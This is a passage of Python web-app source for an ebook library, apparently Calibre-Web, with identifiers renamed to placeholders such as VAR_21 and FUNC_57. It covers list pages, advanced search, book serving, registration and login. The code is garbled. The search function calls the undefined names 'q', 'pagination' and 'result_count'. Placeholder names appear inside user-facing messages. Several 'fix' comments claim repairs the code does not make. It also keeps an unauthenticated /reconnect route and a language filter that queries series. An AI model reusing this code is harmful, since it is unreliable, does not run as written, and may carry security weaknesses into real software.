                                     VAR_149=_(u"Publishers"), VAR_9="publisherlist", VAR_8="publisher", VAR_10=VAR_109)
    else:
        abort(404)
@VAR_2.route("/series")
@login_required_if_no_ano
def FUNC_39():
    """List all series as a list or cover grid (per user preference), or 404 if hidden."""
    if VAR_87.check_visibility(constants.SIDEBAR_SERIES):
        if VAR_87.get_view_property('series', 'dir') == 'desc':
            VAR_10 = db.Series.sort.desc()
            VAR_109 = 0
        else:
            VAR_10 = db.Series.sort.asc()
            VAR_109 = 1
        if VAR_87.get_view_property('series', 'series_view') == 'list':
            VAR_63 = calibre_db.session.query(db.Series, func.count('books_series_link.book').label('count')) \
                .join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
                .group_by(text('books_series_link.series')).order_by(VAR_10).all()
            VAR_107 = calibre_db.session.query(func.upper(func.substr(db.Series.sort, 1, 1)).label('char')) \
                .join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
                .group_by(func.upper(func.substr(db.Series.sort, 1, 1))).all()
            # fix: pass the computed letter list (was the undefined name "charlist")
            return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=VAR_107,
                                         VAR_149=_(u"Series"), VAR_9="serieslist", VAR_8="series")
        else:
            # Grid view: query one representative book per series for the cover.
            VAR_63 = calibre_db.session.query(db.Books, func.count('books_series_link').label('count')) \
                .join(db.books_series_link).join(db.Series).filter(calibre_db.common_filters()) \
                .group_by(text('books_series_link.series')).order_by(VAR_10).all()
            VAR_107 = calibre_db.session.query(func.upper(func.substr(db.Series.sort, 1, 1)).label('char')) \
                .join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
                .group_by(func.upper(func.substr(db.Series.sort, 1, 1))).all()
            # fix: pass the computed letter list (was the undefined name "charlist")
            return render_title_template('grid.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=VAR_107,
                                         VAR_149=_(u"Series"), VAR_9="serieslist", VAR_8="series", bodyClass="grid-view",
                                         VAR_10=VAR_109)
    else:
        abort(404)
@VAR_2.route("/ratings")
@login_required_if_no_ano
def FUNC_40():
    """List all ratings together with their per-rating book counts."""
    if not VAR_87.check_visibility(constants.SIDEBAR_RATING):
        abort(404)
    if VAR_87.get_view_property('ratings', 'dir') == 'desc':
        VAR_10, VAR_109 = db.Ratings.rating.desc(), 0
    else:
        VAR_10, VAR_109 = db.Ratings.rating.asc(), 1
    VAR_63 = calibre_db.session.query(db.Ratings, func.count('books_ratings_link.book').label('count'),
                                      (db.Ratings.rating / 2).label('name')) \
        .join(db.books_ratings_link).join(db.Books).filter(calibre_db.common_filters()) \
        .group_by(text('books_ratings_link.rating')).order_by(VAR_10).all()
    return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=list(),
                                 VAR_149=_(u"Ratings list"), VAR_9="ratingslist", VAR_8="ratings", VAR_10=VAR_109)
@VAR_2.route("/formats")
@login_required_if_no_ano
def FUNC_41():
    """List all file formats together with their per-format book counts."""
    if not VAR_87.check_visibility(constants.SIDEBAR_FORMAT):
        abort(404)
    # NOTE(review): the stored sort direction is read from the 'ratings' view
    # property here, not a 'formats' one — preserved as-is; confirm upstream.
    if VAR_87.get_view_property('ratings', 'dir') == 'desc':
        VAR_10, VAR_109 = db.Data.format.desc(), 0
    else:
        VAR_10, VAR_109 = db.Data.format.asc(), 1
    VAR_63 = calibre_db.session.query(db.Data,
                                      func.count('data.book').label('count'),
                                      db.Data.format.label('format')) \
        .join(db.Books).filter(calibre_db.common_filters()) \
        .group_by(db.Data.format).order_by(VAR_10).all()
    return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=list(),
                                 VAR_149=_(u"File formats list"), VAR_9="formatslist", VAR_8="formats", VAR_10=VAR_109)
@VAR_2.route("/language")
@login_required_if_no_ano
def FUNC_42():
    """List the visible languages with per-language book counts, or 404 if hidden."""
    if VAR_87.check_visibility(constants.SIDEBAR_LANGUAGE):
        VAR_107 = list()
        if VAR_87.filter_language() == u"all":
            VAR_48 = calibre_db.speaking_language()
        else:
            VAR_48 = calibre_db.session.query(db.Languages).filter(
                db.Languages.lang_code == VAR_87.filter_language()).all()
            VAR_48[0].name = isoLanguages.get_language_name(get_locale(), VAR_48[0].name.lang_code)
        VAR_110 = calibre_db.session.query(db.books_languages_link,
                                           func.count('books_languages_link.book').label('bookcount')).group_by(
            text('books_languages_link.lang_code')).all()
        # fix: pass the locals (keyword values were the undefined names
        # "languages"/"lang_counter"/"charlist")
        return render_title_template('languages.html', VAR_48=VAR_48, VAR_110=VAR_110,
                                     VAR_107=VAR_107, VAR_149=_(u"Languages"), VAR_9="langlist",
                                     VAR_8="language")
    else:
        abort(404)
@VAR_2.route("/category")
@login_required_if_no_ano
def FUNC_43():
    """List all tags/categories with their book counts and a letter index, or 404 if hidden."""
    if VAR_87.check_visibility(constants.SIDEBAR_CATEGORY):
        if VAR_87.get_view_property('category', 'dir') == 'desc':
            VAR_10 = db.Tags.name.desc()
            VAR_109 = 0
        else:
            VAR_10 = db.Tags.name.asc()
            VAR_109 = 1
        VAR_63 = calibre_db.session.query(db.Tags, func.count('books_tags_link.book').label('count')) \
            .join(db.books_tags_link).join(db.Books).order_by(VAR_10).filter(calibre_db.common_filters()) \
            .group_by(text('books_tags_link.tag')).all()
        VAR_107 = calibre_db.session.query(func.upper(func.substr(db.Tags.name, 1, 1)).label('char')) \
            .join(db.books_tags_link).join(db.Books).filter(calibre_db.common_filters()) \
            .group_by(func.upper(func.substr(db.Tags.name, 1, 1))).all()
        # fix: pass the computed letter list (was the undefined name "charlist")
        return render_title_template('list.html', VAR_63=VAR_63, folder='web.books_list', VAR_107=VAR_107,
                                     VAR_149=_(u"Categories"), VAR_9="catlist", VAR_8="category", VAR_10=VAR_109)
    else:
        abort(404)
@VAR_2.route("/tasks")
@login_required
def FUNC_44():
    """Show the list of background worker tasks."""
    VAR_88 = render_task_status(WorkerThread.getInstance().tasks)
    return render_title_template('tasks.html', VAR_63=VAR_88, VAR_149=_(u"Tasks"), VAR_9="tasks")
@app.route("/reconnect")
def FUNC_45():
    # Force a reconnect of the calibre database; responds with an empty JSON object.
    calibre_db.reconnect_db(config, ub.app_DB_path)
    return json.dumps({})
@VAR_2.route("/search", methods=["GET"])
@login_required_if_no_ano
def VAR_80():
    """Simple-search entry point: redirect to the stored-sort search list when
    a query was given, otherwise show the empty search page."""
    VAR_17 = request.args.get("query")
    if not VAR_17:
        return render_title_template('search.html',
                                     VAR_35="",
                                     VAR_77=0,
                                     VAR_149=_(u"Search"),
                                     VAR_9="search")
    return redirect(url_for('web.books_list', VAR_8="search", VAR_20='stored', VAR_56=VAR_17))
@VAR_2.route("/advsearch", methods=['POST'])
@login_required_if_no_ano
def FUNC_47():
    """Store the posted advanced-search form in the session and redirect to
    the advanced-search result list."""
    VAR_89 = dict(request.form)
    for VAR_111 in ('include_tag', 'exclude_tag', 'include_serie', 'exclude_serie',
                    'include_shelf', 'exclude_shelf', 'include_language', 'exclude_language',
                    'include_extension', 'exclude_extension'):
        # Multi-select fields must be read with getlist to keep every value.
        VAR_89[VAR_111] = list(request.form.getlist(VAR_111))
    VAR_91['query'] = json.dumps(VAR_89)
    return redirect(url_for('web.books_list', VAR_8="advsearch", VAR_20='stored', VAR_56=""))
def FUNC_48(VAR_16, VAR_17, VAR_21):
    """Apply the advanced-search terms for custom columns VAR_16 to query VAR_21 and return it."""
    for c in VAR_16:
        if c.datatype == "datetime":
            VAR_128 = VAR_17.get('custom_column_' + str(c.id) + '_start')
            VAR_129 = VAR_17.get('custom_column_' + str(c.id) + '_end')
            if VAR_128:
                # fix: chain on VAR_21 (was the undefined name "q"), same throughout
                VAR_21 = VAR_21.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
                    func.datetime(db.cc_classes[c.id].value) >= func.datetime(VAR_128)))
            if VAR_129:
                VAR_21 = VAR_21.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
                    func.datetime(db.cc_classes[c.id].value) <= func.datetime(VAR_129)))
        else:
            VAR_130 = VAR_17.get('custom_column_' + str(c.id))
            if VAR_130 != '' and VAR_130 is not None:
                if c.datatype == 'bool':
                    VAR_21 = VAR_21.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
                        db.cc_classes[c.id].value == (VAR_130 == "True")))
                elif c.datatype == 'int' or c.datatype == 'float':
                    VAR_21 = VAR_21.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
                        db.cc_classes[c.id].value == VAR_130))
                elif c.datatype == 'rating':
                    # UI stars are half of the stored 0-10 rating value.
                    VAR_21 = VAR_21.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
                        db.cc_classes[c.id].value == int(float(VAR_130) * 2)))
                else:
                    VAR_21 = VAR_21.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
                        func.lower(db.cc_classes[c.id].value).ilike("%" + VAR_130 + "%")))
    return VAR_21
def FUNC_49(VAR_21, VAR_22, VAR_23):
    """Apply include/exclude language filters to query VAR_21 and return it.

    A user-level language restriction overrides both lists.
    """
    if VAR_87.filter_language() != "all":
        # fix: chain on VAR_21 (was the undefined name "q"), same below
        VAR_21 = VAR_21.filter(db.Books.languages.any(db.Languages.lang_code == VAR_87.filter_language()))
    else:
        for language in VAR_22:
            VAR_21 = VAR_21.filter(db.Books.languages.any(db.Languages.id == language))
        for language in VAR_23:
            VAR_21 = VAR_21.filter(not_(db.Books.series.any(db.Languages.id == language)))
    return VAR_21
def FUNC_50(VAR_21, VAR_24, VAR_25):
    """Filter query VAR_21 by maximum (VAR_24) and minimum (VAR_25) star rating and return it."""
    if VAR_24:
        # UI stars are half of the stored 0-10 rating value.
        VAR_24 = int(VAR_24) * 2
        VAR_21 = VAR_21.filter(db.Books.ratings.any(db.Ratings.rating <= VAR_24))
    if VAR_25:
        # fix: the doubled value was stored in a dead local ("rating_low") and
        # never applied; also chain on VAR_21 (was the undefined name "q")
        VAR_25 = int(VAR_25) * 2
        VAR_21 = VAR_21.filter(db.Books.ratings.any(db.Ratings.rating >= VAR_25))
    return VAR_21
def FUNC_51(VAR_21, VAR_26):
    """Filter query VAR_21 by read status and return it.

    Uses the configured custom column when present, the builtin ReadBook
    table otherwise.
    """
    if VAR_26:
        if config.config_read_column:
            try:
                # fix: chain on VAR_21 (was the undefined name "q"), same throughout
                if VAR_26 == "True":
                    VAR_21 = VAR_21.join(db.cc_classes[config.config_read_column], isouter=True) \
                        .filter(db.cc_classes[config.config_read_column].value == True)
                else:
                    VAR_21 = VAR_21.join(db.cc_classes[config.config_read_column], isouter=True) \
                        .filter(coalesce(db.cc_classes[config.config_read_column].value, False) != True)
            except (KeyError, AttributeError):
                VAR_3.error(u"Custom Column No.%d is not existing in calibre database", config.config_read_column)
                flash(_("Custom Column No.%(column)d is not existing in calibre database",
                        column=config.config_read_column),
                      category="error")
                return VAR_21
        else:
            if VAR_26 == "True":
                VAR_21 = VAR_21.join(ub.ReadBook, db.Books.id == ub.ReadBook.book_id, isouter=True) \
                    .filter(ub.ReadBook.user_id == int(VAR_87.id),
                            ub.ReadBook.read_status == ub.ReadBook.STATUS_FINISHED)
            else:
                VAR_21 = VAR_21.join(ub.ReadBook, db.Books.id == ub.ReadBook.book_id, isouter=True) \
                    .filter(ub.ReadBook.user_id == int(VAR_87.id),
                            coalesce(ub.ReadBook.read_status, 0) != ub.ReadBook.STATUS_FINISHED)
    return VAR_21
def FUNC_52(VAR_21, VAR_27, VAR_28):
    """Apply include/exclude file-format filters to query VAR_21 and return it."""
    # fix: chain on VAR_21 (was the undefined name "q")
    for extension in VAR_27:
        VAR_21 = VAR_21.filter(db.Books.data.any(db.Data.format == extension))
    for extension in VAR_28:
        VAR_21 = VAR_21.filter(not_(db.Books.data.any(db.Data.format == extension)))
    return VAR_21
def FUNC_53(VAR_21, VAR_29, VAR_30):
    """Apply include/exclude tag filters to query VAR_21 and return it."""
    # fix: chain on VAR_21 (was the undefined name "q")
    for tag in VAR_29:
        VAR_21 = VAR_21.filter(db.Books.tags.any(db.Tags.id == tag))
    for tag in VAR_30:
        VAR_21 = VAR_21.filter(not_(db.Books.tags.any(db.Tags.id == tag)))
    return VAR_21
def FUNC_54(VAR_21, VAR_31, VAR_32):
    """Apply include/exclude series filters to query VAR_21 and return it."""
    # fix: chain on VAR_21 (was the undefined name "q")
    for serie in VAR_31:
        VAR_21 = VAR_21.filter(db.Books.series.any(db.Series.id == serie))
    for serie in VAR_32:
        VAR_21 = VAR_21.filter(not_(db.Books.series.any(db.Series.id == serie)))
    return VAR_21
def FUNC_55(VAR_21, VAR_33, VAR_34):
    """Apply include/exclude shelf filters to query VAR_21 and return it."""
    # fix: chain on VAR_21 (was the undefined name "q")
    VAR_21 = VAR_21.outerjoin(ub.BookShelf, db.Books.id == ub.BookShelf.book_id)\
        .filter(or_(ub.BookShelf.shelf == None, ub.BookShelf.shelf.notin_(VAR_34)))
    if len(VAR_33) > 0:
        VAR_21 = VAR_21.filter(ub.BookShelf.shelf.in_(VAR_33))
    return VAR_21
def FUNC_56(VAR_35,
            VAR_36,
            VAR_37,
            VAR_38,
            VAR_39,
            VAR_40,
            VAR_41,
            VAR_24,
            VAR_25,
            VAR_26,
            ):
    """Build the human-readable advanced-search term display string.

    Extends VAR_35 with a description of every active filter and returns the
    joined string together with the (validated) publish date bounds.
    """
    VAR_35.extend((VAR_36.replace('|', ','), VAR_37, VAR_38))
    if VAR_39:
        try:
            VAR_35.extend([_(u"Published after ") +
                           format_date(datetime.strptime(VAR_39, "%Y-%m-%d"),
                                       format='medium', locale=get_locale())])
        except ValueError:
            VAR_39 = u""
    if VAR_40:
        try:
            VAR_35.extend([_(u"Published before ") +
                           format_date(datetime.strptime(VAR_40, "%Y-%m-%d"),
                                       format='medium', locale=get_locale())])
        except ValueError:
            VAR_40 = u""  # fix: reset the *end* date on parse failure (was clearing VAR_39)
    VAR_92 = {'tag': db.Tags, 'serie':db.Series, 'shelf':ub.Shelf}
    for key, db_element in VAR_92.items():
        VAR_112 = calibre_db.session.query(db_element).filter(db_element.id.in_(VAR_41['include_' + key])).all()
        VAR_35.extend(tag.name for tag in VAR_112)
        # fix: the excluded names were queried into a dead local while the
        # included list was appended a second time
        VAR_112 = calibre_db.session.query(db_element).filter(db_element.id.in_(VAR_41['exclude_' + key])).all()
        VAR_35.extend(tag.name for tag in VAR_112)
    VAR_57 = calibre_db.session.query(db.Languages). \
        filter(db.Languages.id.in_(VAR_41['include_language'])).all()
    if VAR_57:
        # fix: use the localized names (the speaking_language result was discarded)
        VAR_57 = calibre_db.speaking_language(VAR_57)
        VAR_35.extend(language.name for language in VAR_57)
    VAR_57 = calibre_db.session.query(db.Languages). \
        filter(db.Languages.id.in_(VAR_41['exclude_language'])).all()
    if VAR_57:
        VAR_57 = calibre_db.speaking_language(VAR_57)
        VAR_35.extend(language.name for language in VAR_57)
    if VAR_24:
        VAR_35.extend([_(u"Rating <= %(rating)s", rating=VAR_24)])
    if VAR_25:
        VAR_35.extend([_(u"Rating >= %(rating)s", rating=VAR_25)])
    if VAR_26:
        VAR_35.extend([_(u"Read Status = %(status)s", status=VAR_26)])
    VAR_35.extend(ext for ext in VAR_41['include_extension'])
    VAR_35.extend(ext for ext in VAR_41['exclude_extension'])
    # Drop the empty entries before joining for display.
    VAR_35 = " + ".join(filter(None, VAR_35))
    return VAR_35, VAR_39, VAR_40
def FUNC_57(VAR_17, VAR_18=None, VAR_10=None, VAR_19=None):
    """Execute an advanced search and render the result page.

    VAR_17 is the submitted search-term mapping, VAR_18 the result offset,
    VAR_10 the order-by clause list and VAR_19 the page size.

    NOTE(review): several filter steps below call ``q.filter(...)`` although
    only ``VAR_21`` is defined in this scope — this looks like a rename
    leftover and would raise NameError at runtime; confirm against upstream.
    """
    VAR_10 = VAR_10 or [db.Books.sort]
    VAR_65 = None
    VAR_16 = get_cc_columns(filter_config_custom_read=True)
    # Register a Python-side lower() so ilike behaves case-insensitively.
    calibre_db.session.connection().connection.connection.create_function("lower", 1, db.lcase)
    VAR_21 = calibre_db.session.query(db.Books).outerjoin(db.books_series_link, db.Books.id == db.books_series_link.c.book)\
        .outerjoin(db.Series)\
        .filter(calibre_db.common_filters(True))
    # Collect include/exclude id lists for every taggable dimension.
    VAR_41 = dict()
    VAR_92 = ['tag', 'serie', 'shelf', 'language', 'extension']
    for VAR_113 in VAR_92:
        VAR_41['include_' + VAR_113] = VAR_17.get('include_' + VAR_113)
        VAR_41['exclude_' + VAR_113] = VAR_17.get('exclude_' + VAR_113)
    VAR_36 = VAR_17.get("author_name")
    VAR_37 = VAR_17.get("book_title")
    VAR_38 = VAR_17.get("publisher")
    VAR_39 = VAR_17.get("publishstart")
    VAR_40 = VAR_17.get("publishend")
    VAR_25 = VAR_17.get("ratinghigh")
    VAR_24 = VAR_17.get("ratinglow")
    VAR_93 = VAR_17.get("comment")
    VAR_26 = VAR_17.get("read_status")
    if VAR_36:
        VAR_36 = VAR_36.strip().lower().replace(',', '|')
    if VAR_37:
        VAR_37 = VAR_37.strip().lower()
    if VAR_38:
        VAR_38 = VAR_38.strip().lower()
    VAR_35 = []
    VAR_94 = False
    # Describe active custom-column criteria (VAR_94 marks "any present").
    for c in VAR_16:
        if c.datatype == "datetime":
            VAR_131 = VAR_17.get('custom_column_' + str(c.id) + '_start')
            VAR_132 = VAR_17.get('custom_column_' + str(c.id) + '_end')
            if VAR_131:
                VAR_35.extend([u"{} >= {}".format(c.name,
                                                  format_date(datetime.strptime(VAR_131, "%Y-%m-%d"),
                                                              format='medium',
                                                              locale=get_locale())
                                                  )])
                VAR_94 = True
            if VAR_132:
                VAR_35.extend([u"{} <= {}".format(c.name,
                                                  format_date(datetime.strptime(VAR_132, "%Y-%m-%d").date(),
                                                              format='medium',
                                                              locale=get_locale())
                                                  )])
                VAR_94 = True
        elif VAR_17.get('custom_column_' + str(c.id)):
            VAR_35.extend([(u"{}: {}".format(c.name, VAR_17.get('custom_column_' + str(c.id))))])
            VAR_94 = True
    if any(VAR_41.values()) or VAR_36 or VAR_37 or VAR_38 or VAR_39 or VAR_40 or VAR_25 \
        or VAR_24 or VAR_93 or VAR_94 or VAR_26:
        VAR_35, VAR_39, VAR_40 = FUNC_56(VAR_35,
                                         VAR_36,
                                         VAR_37,
                                         VAR_38,
                                         VAR_39,
                                         VAR_40,
                                         VAR_41,
                                         VAR_24,
                                         VAR_25,
                                         VAR_26)
        VAR_21 = q.filter()
        if VAR_36:
            VAR_21 = q.filter(db.Books.authors.any(func.lower(db.Authors.name).ilike("%" + VAR_36 + "%")))
        if VAR_37:
            VAR_21 = q.filter(func.lower(db.Books.title).ilike("%" + VAR_37 + "%"))
        if VAR_39:
            VAR_21 = q.filter(func.datetime(db.Books.pubdate) > func.datetime(VAR_39))
        if VAR_40:
            VAR_21 = q.filter(func.datetime(db.Books.pubdate) < func.datetime(VAR_40))
        VAR_21 = FUNC_51(VAR_21, VAR_26)
        if VAR_38:
            VAR_21 = q.filter(db.Books.publishers.any(func.lower(db.Publishers.name).ilike("%" + VAR_38 + "%")))
        VAR_21 = FUNC_53(VAR_21, VAR_41['include_tag'], VAR_41['exclude_tag'])
        VAR_21 = FUNC_54(VAR_21, VAR_41['include_serie'], VAR_41['exclude_serie'])
        VAR_21 = FUNC_55(VAR_21, VAR_41['include_shelf'], VAR_41['exclude_shelf'])
        VAR_21 = FUNC_52(VAR_21, VAR_41['include_extension'], VAR_41['exclude_extension'])
        VAR_21 = FUNC_49(VAR_21, VAR_41['include_language'], VAR_41['exclude_language'])
        VAR_21 = FUNC_50(VAR_21, VAR_24, VAR_25)
        if VAR_93:
            VAR_21 = q.filter(db.Books.comments.any(func.lower(db.Comments.text).ilike("%" + VAR_93 + "%")))
        try:
            VAR_21 = FUNC_48(VAR_16, VAR_17, VAR_21)
        except AttributeError as ex:
            VAR_3.debug_or_exception(ex)
            flash(_("Error on VAR_80 for custom columns, please restart Calibre-Web"), category="error")
    # Materialize, remember the query in the session, and paginate manually.
    VAR_21 = q.order_by(*VAR_10).all()
    VAR_91['query'] = json.dumps(VAR_17)
    ub.store_ids(VAR_21)
    VAR_77 = len(VAR_21)
    if VAR_18 != None and VAR_19 != None:
        VAR_18 = int(VAR_18)
        VAR_114 = VAR_18 + int(VAR_19)
        VAR_65 = Pagination((VAR_18 / (int(VAR_19)) + 1), VAR_19, VAR_77)
    else:
        VAR_18 = 0
        VAR_114 = VAR_77
    # NOTE(review): `pagination` / `result_count` below are undefined names
    # (rename leftovers for VAR_65 / VAR_77) — confirm.
    return render_title_template('search.html',
                                 adv_searchterm=VAR_35,
                                 VAR_65=pagination,
                                 VAR_63=VAR_21[VAR_18:VAR_114],
                                 VAR_77=result_count,
                                 VAR_149=_(u"Advanced Search"), VAR_9="advsearch")
@VAR_2.route("/advsearch", methods=['GET'])
@login_required_if_no_ano
def FUNC_58():
    """Show the advanced-search form, pre-populated with custom columns."""
    visible_columns = get_cc_columns(filter_config_custom_read=True)
    return FUNC_29(visible_columns)
@VAR_2.route("/cover/<int:VAR_5>")
@login_required_if_no_ano
def FUNC_59(VAR_5):
    """Serve the cover image for book id VAR_5."""
    cover_response = get_book_cover(VAR_5)
    return cover_response
@VAR_2.route("/robots.txt")
def FUNC_60():
    """Serve the static robots.txt file."""
    robots = send_from_directory(constants.STATIC_DIR, "robots.txt")
    return robots
@VAR_2.route("/show/<int:VAR_5>/<VAR_6>", defaults={'anyname': 'None'})
@VAR_2.route("/show/<int:VAR_5>/<VAR_6>/<VAR_42>")
@login_required_if_no_ano
@FUNC_2
def FUNC_61(VAR_5, VAR_6, VAR_42):
    """Stream the raw file of book VAR_5 in format VAR_6 to the client.

    Serves from Google Drive when configured, otherwise from the local
    calibre directory; TXT files are transcoded to UTF-8 first.
    """
    # Strip a possible extension from the format segment ("epub.epub" etc.).
    VAR_6 = VAR_6.split(".")[0]
    VAR_95 = calibre_db.get_book(VAR_5)
    VAR_8 = calibre_db.get_book_format(VAR_5, VAR_6.upper())
    if not VAR_8:
        return "File not in Database"
    VAR_3.info('Serving VAR_95: %s', VAR_8.name)
    if config.config_use_google_drive:
        try:
            VAR_133 = Headers()
            VAR_133["Content-Type"] = mimetypes.types_map.get('.' + VAR_6, "application/octet-stream")
            VAR_134 = getFileFromEbooksFolder(VAR_95.path, VAR_8.name + "." + VAR_6)
            return do_gdrive_download(VAR_134, VAR_133, (VAR_6.upper() == 'TXT'))
        except AttributeError as ex:
            VAR_3.debug_or_exception(ex)
            return "File Not Found"
    else:
        if VAR_6.upper() == 'TXT':
            try:
                # Detect the file's encoding and re-encode as UTF-8 so the
                # browser renders it correctly.
                VAR_145 = open(os.path.join(config.config_calibre_dir, VAR_95.path, VAR_8.name + "." + VAR_6),
                               "rb").read()
                VAR_135 = chardet.detect(VAR_145)
                return make_response(
                    VAR_145.decode(VAR_135['encoding'], 'surrogatepass').encode('utf-8', 'surrogatepass'))
            except FileNotFoundError:
                VAR_3.error("File Not Found")
                return "File Not Found"
        return send_from_directory(os.path.join(config.config_calibre_dir, VAR_95.path), VAR_8.name + "." + VAR_6)
@VAR_2.route("/download/<int:VAR_5>/<VAR_6>", defaults={'anyname': 'None'})
@VAR_2.route("/download/<int:VAR_5>/<VAR_6>/<VAR_42>")
@login_required_if_no_ano
@FUNC_1
def FUNC_62(VAR_5, VAR_6, VAR_42):
    """Hand out the download link for book VAR_5 in format VAR_6."""
    if "Kobo" in request.headers.get('User-Agent'):
        client_hint = "kobo"
    else:
        client_hint = ""
    return get_download_link(VAR_5, VAR_6, client_hint)
@VAR_2.route('/send/<int:VAR_5>/<VAR_6>/<int:VAR_43>')
@login_required
@FUNC_1
def FUNC_63(VAR_5, VAR_6, VAR_43):
    """Queue book VAR_5 (format VAR_6) for mailing to the user's Kindle address.

    Flashes success or error and redirects back to the referring page.
    """
    if not config.get_mail_server_configured():
        flash(_(u"Please configure the SMTP mail settings first..."), category="error")
    elif VAR_87.kindle_mail:
        # send_mail returns None on success, otherwise an error description.
        VAR_135 = send_mail(VAR_5, VAR_6, VAR_43, VAR_87.kindle_mail, config.config_calibre_dir,
                            VAR_87.name)
        if VAR_135 is None:
            flash(_(u"Book successfully queued for sending to %(kindlemail)s", kindlemail=VAR_87.kindle_mail),
                  category="success")
            ub.update_download(VAR_5, int(VAR_87.id))
        else:
            flash(_(u"Oops! There was an VAR_139 sending this VAR_95: %(res)s", res=VAR_135), category="error")
    else:
        flash(_(u"Please update your FUNC_68 with a valid Send to Kindle E-mail Address."), category="error")
    if "HTTP_REFERER" in request.environ:
        return redirect(request.environ["HTTP_REFERER"])
    else:
        return redirect(url_for('web.index'))
@VAR_2.route('/register', methods=['GET', 'POST'])
def FUNC_64():
    """Public self-registration: validate input, create the user and mail
    a generated password. Requires public registration and a configured
    mail server; registered e-mail domains are checked against a whitelist.
    """
    if not config.config_public_reg:
        abort(404)
    if VAR_87 is not None and VAR_87.is_authenticated:
        return redirect(url_for('web.index'))
    if not config.get_mail_server_configured():
        flash(_(u"E-Mail server is not configured, please contact your administrator!"), category="error")
        return render_title_template('register.html', VAR_149=_("Register"), VAR_9="register")
    if request.method == "POST":
        VAR_55 = request.form.to_dict()
        # Username is the e-mail itself when config_register_email is set.
        VAR_115 = VAR_55["email"].strip() if config.config_register_email else VAR_55.get('name')
        if not VAR_115 or not VAR_55.get("email"):
            flash(_(u"Please fill out all fields!"), category="error")
            return render_title_template('register.html', VAR_149=_("Register"), VAR_9="register")
        try:
            VAR_115 = check_username(VAR_115)
            VAR_136 = check_email(VAR_55["email"])
        except Exception as ex:
            flash(str(ex), category="error")
            return render_title_template('register.html', VAR_149=_("Register"), VAR_9="register")
        VAR_116 = ub.User()
        if check_valid_domain(VAR_136):
            VAR_116.name = VAR_115
            VAR_116.email = VAR_136
            VAR_137 = generate_random_password()
            VAR_116.password = generate_password_hash(VAR_137)
            VAR_116.role = config.config_default_role
            VAR_116.sidebar_view = config.config_default_show
            try:
                ub.session.add(VAR_116)
                ub.session.commit()
                if VAR_0['oauth']:
                    register_user_with_oauth(VAR_116)
                send_registration_mail(VAR_55["email"].strip(), VAR_115, VAR_137)
            except Exception:
                ub.session.rollback()
                flash(_(u"An unknown VAR_139 occurred. Please try again later."), category="error")
                return render_title_template('register.html', VAR_149=_("Register"), VAR_9="register")
        else:
            flash(_(u"Your e-mail is not allowed to register"), category="error")
            VAR_3.warning('Registering failed for VAR_104 "%s" e-mail address: %s', VAR_115, VAR_55["email"])
            return render_title_template('register.html', VAR_149=_("Register"), VAR_9="register")
        flash(_(u"Confirmation e-mail was send to your e-mail account."), category="success")
        return redirect(url_for('web.login'))
    if VAR_0['oauth']:
        register_user_with_oauth()
    return render_title_template('register.html', config=config, VAR_149=_("Register"), VAR_9="register")
@VAR_2.route('/login', methods=['GET', 'POST'])
def FUNC_65():
    """Login view: LDAP with local fallback, plain local login, and the
    "forgot password" flow. Renders the login form on GET or failure.
    """
    if VAR_87 is not None and VAR_87.is_authenticated:
        return redirect(url_for('web.index'))
    if config.config_login_type == constants.LOGIN_LDAP and not services.ldap:
        VAR_3.error(u"Cannot activate LDAP authentication")
        flash(_(u"Cannot activate LDAP authentication"), category="error")
    if request.method == "POST":
        VAR_117 = request.form.to_dict()
        # Username lookup is case-insensitive.
        VAR_104 = ub.session.query(ub.User).filter(func.lower(ub.User.name) == VAR_117['username'].strip().lower()) \
            .first()
        if config.config_login_type == constants.LOGIN_LDAP and services.ldap and VAR_104 and VAR_117['password'] != "":
            VAR_138, VAR_139 = services.ldap.bind_user(VAR_117['username'], VAR_117['password'])
            if VAR_138:
                login_user(VAR_104, remember=bool(VAR_117.get('remember_me')))
                ub.store_user_session()
                VAR_3.debug(u"You are now logged in as: '%s'", VAR_104.name)
                flash(_(u"you are now logged in as: '%(VAR_115)s'", VAR_115=VAR_104.name),
                      category="success")
                return redirect_back(url_for("web.index"))
            elif VAR_138 is None and VAR_104 and check_password_hash(str(VAR_104.password), VAR_117['password']) \
                and VAR_104.name != "Guest":
                # LDAP server unreachable: fall back to the local password hash.
                login_user(VAR_104, remember=bool(VAR_117.get('remember_me')))
                ub.store_user_session()
                VAR_3.info("Local Fallback Login as: '%s'", VAR_104.name)
                flash(_(u"Fallback Login as: '%(VAR_115)s', LDAP Server not reachable, or VAR_104 not known",
                        VAR_115=VAR_104.name),
                      category="warning")
                return redirect_back(url_for("web.index"))
            elif VAR_138 is None:
                VAR_3.info(VAR_139)
                flash(_(u"Could not FUNC_65: %(message)s", message=VAR_139), category="error")
            else:
                VAR_140 = request.headers.get('X-Forwarded-For', request.remote_addr)
                VAR_3.warning('LDAP Login failed for VAR_104 "%s" IP-address: %s', VAR_117['username'], VAR_140)
                flash(_(u"Wrong Username or Password"), category="error")
        else:
            VAR_140 = request.headers.get('X-Forwarded-For', request.remote_addr)
            if 'forgot' in VAR_117 and VAR_117['forgot'] == 'forgot':
                # Password reset: generate a new password and mail it out.
                if VAR_104 != None and VAR_104.name != "Guest":
                    VAR_147, VAR_64 = reset_password(VAR_104.id)
                    if VAR_147 == 1:
                        flash(_(u"New Password was send to your VAR_136 address"), category="info")
                        VAR_3.info('Password reset for VAR_104 "%s" IP-address: %s', VAR_117['username'], VAR_140)
                    else:
                        VAR_3.error(u"An unknown VAR_139 occurred. Please try again later")
                        flash(_(u"An unknown VAR_139 occurred. Please try again later."), category="error")
                else:
                    flash(_(u"Please enter valid username to reset password"), category="error")
                    VAR_3.warning('Username missing for VAR_137 reset IP-address: %s', VAR_140)
            else:
                if VAR_104 and check_password_hash(str(VAR_104.password), VAR_117['password']) and VAR_104.name != "Guest":
                    login_user(VAR_104, remember=bool(VAR_117.get('remember_me')))
                    ub.store_user_session()
